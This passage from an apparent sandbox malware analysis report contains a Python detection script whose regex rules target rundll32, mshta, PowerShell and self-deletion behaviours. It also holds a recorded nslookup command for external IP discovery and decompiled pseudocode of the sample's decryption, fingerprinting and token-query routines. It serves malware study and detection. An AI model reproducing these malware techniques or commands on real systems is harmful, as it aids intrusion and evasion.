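    (33, r'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1"'),
]

# new-alias -name <random> -value <real cmdlet or alias>
ALIAS_RE = re.compile(r"new-alias\s+-name\s+(\w+)\s+-value\s+(\w+)\s*;?", re.I)

# Rule names are this example's own; each regex targets one behaviour seen above.
RULES = [
    ("rundll32_ordinal_export", re.compile(r'rundll32(?:\.exe)?\s+"?[^"\s]+\.dll"?,#\d+', re.I)),
    ("mshta_inline_hta_registry_read", re.compile(r'mshta(?:\.exe)?"?\s+"?about:<hta:application>.*regread\(', re.I | re.S)),
    ("powershell_iex_from_registry", re.compile(r"\biex\b.*\bHKCU:", re.I)),
    ("csc_compile_from_temp", re.compile(r'csc\.exe"?\s.*@"?[^"]*\\AppData\\Local\\Temp\\', re.I)),
    ("ping_delay_then_delete", re.compile(r"\bping\b[^&]*-n\s+\d+[^&]*&&\s*del\b", re.I)),
    ("external_ip_discovery", re.compile(r"nslookup\s+myip\.opendns\.com", re.I)),
]


def resolve_powershell_aliases(cmdline):
    """Drop New-Alias definitions and substitute the alias names with their targets.

    Returns (resolved command line, {alias: target}). Lines without New-Alias
    come back unchanged.
    """
    aliases = {name: target for name, target in ALIAS_RE.findall(cmdline)}
    resolved = ALIAS_RE.sub("", cmdline)
    for name, target in aliases.items():
        resolved = re.sub(r"\b" + re.escape(name) + r"\b", target, resolved)
    return resolved, aliases


def evaluate(records):
    """Map Target ID -> list of rule names that fired on its (alias-resolved) command line."""
    hits = {}
    for target_id, cmdline in records:
        resolved, _ = resolve_powershell_aliases(cmdline)
        matched = [name for name, rx in RULES if rx.search(resolved)]
        if matched:
            hits[target_id] = matched
    return hits


if __name__ == "__main__":
    for target_id, names in sorted(evaluate(PROCESS_RECORDS).items()):
        print(f"Target {target_id}: {', '.join(names)}")
```

Note that `rundll32_ordinal_export` fires twice, on the `cmd.exe` wrapper and on the `rundll32.exe` child, which is what a process-creation feed would show; correlating the two needs parent PIDs that this report's process list does not print. The `ping_delay_then_delete` rule is the command form behind the "Self deletion via cmd delete" and "Uses ping.exe to sleep" signatures in the overview.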


                                          Execution Graph

                                          Execution Coverage:19.3%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:6
                                          Total number of Limit Nodes:0
                                          execution_graph
                                          • Nodes: 122 = 401700 (GetNLSVersion); 123 = 401731; 124 = 401750; 125 = 401764; 126 = 401843 (GetBinaryTypeW); 127 = 40177c
                                          • Edges: 122 -> 123; 124 -> 125; 125 -> 126; 125 -> 127; 126 -> 127

                                          Callgraph

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph
                                          • Blocks: 0 = 401750-401769 (call 401078); 3 = 40176b-40178f; 4 = 40177c-401783; 7 = 401791-401798; 8 = 40176d-401778; 6 = 4018b7-4018c1; 9 = 40177a-40186f (GetBinaryTypeW); 13 = 401871-401878; 14 = 401883-4018a3; 15 = 4018a5-4018ac (call 4010a0); 16 = 40187a-401881
                                          • Edges: 0 -> 3; 0 -> 4; 3 -> 7; 3 -> 8; 4 -> 6; 7 -> 6; 8 -> 7; 8 -> 9; 9 -> 13; 9 -> 14; 13 -> 6; 14 -> 15; 14 -> 16; 15 -> 6; 16 -> 6
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.495519777.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.495511457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.495713873.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.495720767.000000000042D000.00000020.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.495726963.0000000000432000.00000020.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.495738200.0000000000435000.00000020.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.495749392.000000000043E000.00000020.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.495755515.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.495938167.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.495944033.0000000000482000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.495954473.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.495964036.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.495981629.0000000000498000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                          Similarity
                                          • API ID: BinaryType
                                          • String ID:
                                          • API String ID: 3726996659-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 37%
                                          			E00401700() {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr* _t7;
                                          				intOrPtr _t9;
                                          				intOrPtr* _t13;
                                          
                                          				_t7 = _t13;
                                          				 *((intOrPtr*)(_t7 + 8)) = 0;
                                          				 *((intOrPtr*)(_t7 + 4)) = 0;
                                          				 *_t7 = 0;
                                          				_t9 =  *__imp__GetNLSVersion(); // executed
                                          				_v12 = _t9;
                                          				if(GetLastError() != 0x57) {
                                          					_v8 = 1;
                                          				} else {
                                          					_v8 = 0;
                                          				}
                                          				return _v8;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.495519777.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Version
                                          • String ID:
                                          • API String ID: 1889659487-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • RtlInitializeCriticalSection.NTDLL(00B79448), ref: 00B6314C
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • memset.NTDLL ref: 00B6317D
                                          • RtlInitializeCriticalSection.NTDLL(0614C2D0), ref: 00B6318E
                                            • Part of subcall function 00B61777: RtlInitializeCriticalSection.NTDLL(00B79420), ref: 00B6179B
                                            • Part of subcall function 00B61777: RtlInitializeCriticalSection.NTDLL(00B79400), ref: 00B617B1
                                            • Part of subcall function 00B61777: GetVersion.KERNEL32(?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B617C2
                                            • Part of subcall function 00B61777: GetModuleHandleA.KERNEL32(00001663,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B617F6
                                            • Part of subcall function 00B635F7: RtlAllocateHeap.NTDLL(00000000,-00000003,77D49EB0), ref: 00B63611
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B631B7
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B631C8
                                          • CloseHandle.KERNEL32(000005AC,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B631DC
                                          • GetUserNameA.ADVAPI32(00000000,?), ref: 00B63225
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B63238
                                          • GetUserNameA.ADVAPI32(00000000,?), ref: 00B6324D
                                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 00B6327D
                                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B63292
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B6329C
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B632A9
                                          • GetShellWindow.USER32 ref: 00B632C4
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00B632CB
                                          • memcpy.NTDLL(00B79314,?,00000018,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B63307
                                          • CreateEventA.KERNEL32(00B79208,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B63385
                                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 00B633AF
                                          • OpenEventA.KERNEL32(00100000,00000000,0614B9C8,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B633D7
                                          • CreateEventA.KERNEL32(00B79208,00000001,00000000,0614B9C8,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B633EC
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B633F2
                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B6348A
                                          • SetEvent.KERNEL32(?,00B69CDB,00000000,00000000,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B63520
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00B69CDB), ref: 00B63535
                                          • wsprintfA.USER32 ref: 00B63565
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                          • String ID:
                                          • API String ID: 3929413950-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 58%
                                          			E04893072(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				int _v8;
                                          				long* _v12;
                                          				int _v16;
                                          				BYTE* _v20;
                                          				long* _v24;
                                          				void* _v39;
                                          				char _v40;
                                          				void _v56;
                                          				int _v60;
                                          				intOrPtr _v64;
                                          				void _v67;
                                          				char _v68;
                                          				void* _t61;
                                          				int _t68;
                                          				signed int _t76;
                                          				int _t79;
                                          				int _t81;
                                          				int _t85;
                                          				long _t86;
                                          				int _t90;
                                          				signed int _t94;
                                          				int _t101;
                                          				BYTE* _t102;
                                          				int _t103;
                                          				void* _t104;
                                          				void* _t105;
                                          				void* _t106;
                                          
                                          				_t103 = __eax;
                                          				_t94 = 6;
                                          				_v68 = 0;
                                          				memset( &_v67, 0, _t94 << 2);
                                          				_t105 = _t104 + 0xc;
                                          				asm("stosw");
                                          				asm("stosb");
                                          				_v40 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosw");
                                          				asm("stosb");
                                          				_t61 =  *0x489a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                          				if(_t61 == 0) {
                                          					_a8 = GetLastError();
                                          				} else {
                                          					_t101 = 0x10;
                                          					memcpy( &_v56, _a8, _t101);
                                          					_t106 = _t105 + 0xc;
                                          					_v60 = _t101;
                                          					_v67 = 2;
                                          					_v64 = 0x660e;
                                          					_v68 = 8;
                                          					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                          					if(_t68 == 0) {
                                          						_a8 = GetLastError();
                                          					} else {
                                          						_push(0);
                                          						_push( &_v40);
                                          						_push(1);
                                          						_push(_v12);
                                          						if( *0x489a0e4() == 0) {
                                          							_a8 = GetLastError();
                                          						} else {
                                          							_t18 = _t103 + 0xf; // 0x11f
                                          							_t76 = _t18 & 0xfffffff0;
                                          							if(_a4 != 0 && _t76 == _t103) {
                                          								_t76 = _t76 + _t101;
                                          							}
                                          							_t102 = E04894DF6(_t76);
                                          							_v20 = _t102;
                                          							if(_t102 == 0) {
                                          								_a8 = 8;
                                          							} else {
                                          								_v16 = 0;
                                          								_a8 = 0;
                                          								while(1) {
                                          									_t79 = 0x10;
                                          									_v8 = _t79;
                                          									if(_t103 <= _t79) {
                                          										_v8 = _t103;
                                          									}
                                          									memcpy(_t102, _a12, _v8);
                                          									_t81 = _v8;
                                          									_a12 = _a12 + _t81;
                                          									_t103 = _t103 - _t81;
                                          									_t106 = _t106 + 0xc;
                                          									if(_a4 == 0) {
                                          										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                          									} else {
                                          										_t85 =  *0x489a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                          									}
                                          									if(_t85 == 0) {
                                          										break;
                                          									}
                                          									_t90 = _v8;
                                          									_v16 = _v16 + _t90;
                                          									_t102 =  &(_t102[_t90]);
                                          									if(_t103 != 0) {
                                          										continue;
                                          									} else {
                                          										L17:
                                          										 *_a16 = _v20;
                                          										 *_a20 = _v16;
                                          									}
                                          									goto L21;
                                          								}
                                          								_t86 = GetLastError();
                                          								_a8 = _t86;
                                          								if(_t86 != 0) {
                                          									E04894C73(_v20);
                                          								} else {
                                          									goto L17;
                                          								}
                                          							}
                                          						}
                                          						L21:
                                          						CryptDestroyKey(_v12);
                                          					}
                                          					CryptReleaseContext(_v24, 0);
                                          				}
                                          				return _a8;
                                          			}

                                          APIs
                                          • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,048958B7), ref: 048930AA
                                          • memcpy.NTDLL(?,048958B7,00000010,?,?,?,?,?,?,?,?,?,?,0489564C,00000000,04896D90), ref: 048930C3
                                          • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 048930EC
                                          • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04893104
                                          • memcpy.NTDLL(00000000,04896D90,048958B7,0000011F), ref: 04893156
                                          • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,048958B7,00000020,?,?,0000011F), ref: 0489317F
                                          • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,048958B7,?,?,0000011F), ref: 04893196
                                          • GetLastError.KERNEL32(?,?,0000011F), ref: 048931AE
                                          • GetLastError.KERNEL32 ref: 048931E0
                                          • CryptDestroyKey.ADVAPI32(?), ref: 048931EC
                                          • GetLastError.KERNEL32 ref: 048931F4
                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04893201
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0489564C,00000000,04896D90,048958B7,?,048958B7), ref: 04893209
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                          • String ID:
                                          • API String ID: 1967744295-0
                                          • Opcode ID: 7a617e6b48c514a7c229fe36fb246ef009710f177145e35959ae626ae89d9172
                                          • Instruction ID: 23584e4cc53fc11d867ef5b9656953539ab9b41090c25ea78f2c78b767e1f12d
                                          • Opcode Fuzzy Hash: 7a617e6b48c514a7c229fe36fb246ef009710f177145e35959ae626ae89d9172
                                          • Instruction Fuzzy Hash: 46515BB1900608FFDF109FA5DC88AAE7BF9EB48344F084929F915E6250D7759E14DB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04895410(intOrPtr __edx, void** _a4, void** _a8) {
                                          				intOrPtr _v8;
                                          				struct _FILETIME* _v12;
                                          				short _v56;
                                          				struct _FILETIME* _t12;
                                          				intOrPtr _t13;
                                          				void* _t17;
                                          				void* _t21;
                                          				intOrPtr _t27;
                                          				long _t28;
                                          				void* _t30;
                                          
                                          				_t27 = __edx;
                                          				_t12 =  &_v12;
                                          				GetSystemTimeAsFileTime(_t12);
                                          				_push(0x192);
                                          				_push(0x54d38000);
                                          				_push(_v8);
                                          				_push(_v12);
                                          				L048981C4();
                                          				_push(_t12);
                                          				_v12 = _t12;
                                          				_t13 =  *0x489a348; // 0x9ad5a8
                                          				_t5 = _t13 + 0x489b87e; // 0x5248e26
                                          				_t6 = _t13 + 0x489b59c; // 0x530025
                                          				_push(0x16);
                                          				_push( &_v56);
                                          				_v8 = _t27;
                                          				L04897E2A();
                                          				_t17 = CreateFileMappingW(0xffffffff, 0x489a34c, 4, 0, 0x1000,  &_v56); // executed
                                          				_t30 = _t17;
                                          				if(_t30 == 0) {
                                          					_t28 = GetLastError();
                                          				} else {
                                          					if(GetLastError() == 0xb7) {
                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                          						if(_t21 == 0) {
                                          							_t28 = GetLastError();
                                          							if(_t28 != 0) {
                                          								goto L6;
                                          							}
                                          						} else {
                                          							 *_a4 = _t30;
                                          							 *_a8 = _t21;
                                          							_t28 = 0;
                                          						}
                                          					} else {
                                          						_t28 = 2;
                                          						L6:
                                          						CloseHandle(_t30);
                                          					}
                                          				}
                                          				return _t28;
                                          			}

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04892CE0,?,?,4D283A53,?,?), ref: 0489541C
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04895432
                                          • _snwprintf.NTDLL ref: 04895457
                                          • CreateFileMappingW.KERNELBASE(000000FF,0489A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04895473
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04892CE0,?,?,4D283A53,?), ref: 04895485
                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0489549C
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04892CE0,?,?,4D283A53), ref: 048954BD
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04892CE0,?,?,4D283A53,?), ref: 048954C5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: 3ab2ac6b030070fbc25495f1fbf552e2abe91e152ce9cffa64e22782d666d346
                                          • Instruction ID: 2d0b1cb652df43cd546ac26b8424563c5df2ac2d035c7716b85af6178d35d3da
                                          • Opcode Fuzzy Hash: 3ab2ac6b030070fbc25495f1fbf552e2abe91e152ce9cffa64e22782d666d346
                                          • Instruction Fuzzy Hash: C221C3B2600A14BBDB11AB68DC05F8E37F9EB84B45F184A24F519E6280EA74AD048B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 48912d3-48913df: basic-block edge list (GetUserNameW, RtlAllocateHeap, GetComputerNameW, HeapFree; calls to 489333b and 4892087); rendered graph not reproduced
                                          C-Code - Quality: 96%
                                          			E048912D3(char __eax, void* __esi) {
                                          				long _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v28;
                                          				long _t34;
                                          				signed int _t39;
                                          				long _t50;
                                          				char _t59;
                                          				intOrPtr _t61;
                                          				void* _t62;
                                          				void* _t64;
                                          				char _t65;
                                          				intOrPtr* _t67;
                                          				void* _t68;
                                          				void* _t69;
                                          
                                          				_t69 = __esi;
                                          				_t65 = __eax;
                                          				_v8 = 0;
                                          				_v12 = __eax;
                                          				if(__eax == 0) {
                                          					_t59 =  *0x489a310; // 0xd448b889
                                          					_v12 = _t59;
                                          				}
                                          				_t64 = _t69;
                                          				E0489333B( &_v12, _t64);
                                          				if(_t65 != 0) {
                                          					 *_t69 =  *_t69 ^  *0x489a344 ^ 0x46d76429;
                                          				} else {
                                          					GetUserNameW(0,  &_v8); // executed
                                          					_t50 = _v8;
                                          					if(_t50 != 0) {
                                          						_t62 = RtlAllocateHeap( *0x489a2d8, 0, _t50 + _t50);
                                          						if(_t62 != 0) {
                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                          								_t64 = _t62;
                                          								 *_t69 =  *_t69 ^ E04892087(_v8 + _v8, _t64);
                                          							}
                                          							HeapFree( *0x489a2d8, 0, _t62);
                                          						}
                                          					}
                                          				}
                                          				_t61 = __imp__;
                                          				_v8 = _v8 & 0x00000000;
                                          				GetComputerNameW(0,  &_v8);
                                          				_t34 = _v8;
                                          				if(_t34 != 0) {
                                          					_t68 = RtlAllocateHeap( *0x489a2d8, 0, _t34 + _t34);
                                          					if(_t68 != 0) {
                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                          							_t64 = _t68;
                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04892087(_v8 + _v8, _t64);
                                          						}
                                          						HeapFree( *0x489a2d8, 0, _t68);
                                          					}
                                          				}
                                          				asm("cpuid");
                                          				_t67 =  &_v28;
                                          				 *_t67 = 1;
                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                          				 *(_t67 + 0xc) = _t64;
                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                          				return _t39;
                                          			}

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0489130A
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04891321
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0489132E
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0489134F
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04891376
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0489138A
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04891397
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 048913B5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 21f06d68ad4d99c298c8cb13b4a5a12bcf3330f147f7b530299b64c556c183e9
                                          • Instruction ID: 34cbf6824bce956f9e898a6103c99ab77c97613e2a66c401388f2b908633ad51
                                          • Opcode Fuzzy Hash: 21f06d68ad4d99c298c8cb13b4a5a12bcf3330f147f7b530299b64c556c183e9
                                          • Instruction Fuzzy Hash: 2E314371604606EFEB14DFA9DC85A6EB7F9FB48300F584969E545D3210EB74ED00AB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph b5be55-b5bf97: basic-block edge list (StrRChrA, _strupr, lstrlen, CreateEventA, RtlAddVectoredExceptionHandler, GetLastError, RtlRemoveVectoredExceptionHandler; calls to b513c3, b712f1, b61c16, b637c5, b6312e); rendered graph not reproduced
                                          APIs
                                          • StrRChrA.SHLWAPI(0614B5B0,00000000,0000005C,?,?,?), ref: 00B5BE91
                                          • _strupr.NTDLL ref: 00B5BEA7
                                          • lstrlen.KERNEL32(0614B5B0,?,?), ref: 00B5BEAF
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 00B5BF2F
                                          • RtlAddVectoredExceptionHandler.NTDLL(00000000,00B696E0), ref: 00B5BF56
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00B5BF70
                                          • RtlRemoveVectoredExceptionHandler.NTDLL(02BB05B8), ref: 00B5BF86
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                                          • String ID:
                                          • API String ID: 2251957091-0
                                          • Opcode ID: cf38622d9a1d2be6fdc24747cd26048b7917e38c3bf390df81e22acd2bf9ad5f
                                          • Instruction ID: 7c9b7c54debbaa8649cdafbb5cf7dc9b8b8003b8a125100a1dae0842518b7c1e
                                          • Opcode Fuzzy Hash: cf38622d9a1d2be6fdc24747cd26048b7917e38c3bf390df81e22acd2bf9ad5f
                                          • Instruction Fuzzy Hash: 49311672904216BFDB10AF78AC89E6E77E8EB04712B5504F5EE16E35A0DB308CD88F50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E04894695(char _a4, void* _a8) {
                                          				void* _v8;
                                          				void* _v12;
                                          				char _v16;
                                          				void* _v20;
                                          				char _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				void* _v44;
                                          				void** _t33;
                                          				void* _t40;
                                          				void* _t43;
                                          				void** _t44;
                                          				intOrPtr* _t47;
                                          				char _t48;
                                          
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v20 = _a4;
                                          				_t48 = 0;
                                          				_v16 = 0;
                                          				_a4 = 0;
                                          				_v44 = 0x18;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                          					_t33 =  &_v8;
                                          					__imp__(_v12, 8, _t33);
                                          					if(_t33 >= 0) {
                                          						_t47 = __imp__;
                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                          						_t44 = E04894DF6(_a4);
                                          						if(_t44 != 0) {
                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                          							if(_t40 >= 0) {
                                          								memcpy(_a8,  *_t44, 0x1c);
                                          								_t48 = 1;
                                          							}
                                          							E04894C73(_t44);
                                          						}
                                          						NtClose(_v8); // executed
                                          					}
                                          					NtClose(_v12);
                                          				}
                                          				return _t48;
                                          			}

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 048946DC
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 048946EF
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0489470B
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04894728
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 04894735
                                          • NtClose.NTDLL(?), ref: 04894747
                                          • NtClose.NTDLL(00000000), ref: 04894751
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 6cc1232acd83a91c107ed80fb8574eda74dbc96ff8db7571f78960558e58bd21
                                          • Instruction ID: e73c2073e20d9518b56a0a6026a78dfcf4f11f845486fb2e79a2ba6df8dfbfb4
                                          • Opcode Fuzzy Hash: 6cc1232acd83a91c107ed80fb8574eda74dbc96ff8db7571f78960558e58bd21
